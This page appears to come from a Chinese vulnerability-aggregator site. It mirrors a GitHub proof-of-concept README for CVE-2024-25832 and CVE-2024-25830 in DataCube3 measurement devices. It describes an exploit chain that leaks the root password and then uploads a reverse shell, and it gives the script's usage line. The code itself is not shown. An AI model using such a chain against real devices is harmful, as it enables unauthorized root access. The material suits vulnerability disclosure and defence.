CVE-2024-25832 PoC — Field Logic DataCube3 安全漏洞

来源

https://github.com/0xNslabs/CVE-2024-25832-PoC

关联漏洞

标题:Field Logic DataCube3 安全漏洞 (CVE-2024-25832)
Description:Field Logic DataCube4是Field Logic公司的一个小型测量终端系统。 Field Logic DataCube3 1.0 版本存在安全漏洞，该漏洞源于容易受到不受限制的文件上传的攻击，这可能允许经过身份验证的恶意行为者通过操纵文件扩展名来上传危险类型的文件。

Description

PoC Script for CVE-2024-25832: Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload in DataCube3

介绍

# CVE-2024-25830 and CVE-2024-25832 - DataCube3 Improper Access Control and Unrestricted File Upload.

## Overview
This repository features a Proof of Concept (PoC) for a two-step exploit chain targeting DataCube3 devices. It combines CVE-2024-25830 (Improper Access Control) to extract root passwords and CVE-2024-25832 (Unrestricted File Upload) to deploy a reverse shell script. This PoC complements the detailed vulnerability analysis in the blog post "DataCube3 Vulnerability Report."

### Affected versions
All F-logic DataCube3 devices version 1.0.

### PoC Script Usage

```python
# Usage: python datacube3.py --RHOST <Target-IP> --RPORT <Target-Port> --LHOST <Local-IP> --LPORT <Local-Port>
# Example: python datacube3.py --RHOST 192.168.1.1 --RPORT 443 --LHOST 192.168.1.100 --LPORT 4444
```

 ### Video Proof of Concept

![Script PoC CVE-2024-25832](https://neroteam.com/blog/pages/f-logic-datacube3-vulnerability-report/datacube3-1.jpg?m=1709698092)

[![Datacube3 Exploit chain](https://i.ibb.co/7gXHL9q/500px-youtube-social-play.png)](https://youtu.be/5hJKqgYjrVo)

### Note
FOR EDUCATIONAL PURPOSE ONLY.

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看

备注

1. 建议优先通过来源进行访问。

2. 本地 POC 快照面向订阅用户开放；当原始来源失效或无法访问时，本地镜像作为订阅权益的一部分提供。

查看订阅方案 →

目标达成 感谢每一位支持者 — 我们达成了 100% 目标！

CVE-2024-25832 PoC — Field Logic DataCube3 安全漏洞

来源

关联漏洞

Description

介绍

文件快照

备注

目标达成感谢每一位支持者 — 我们达成了 100% 目标！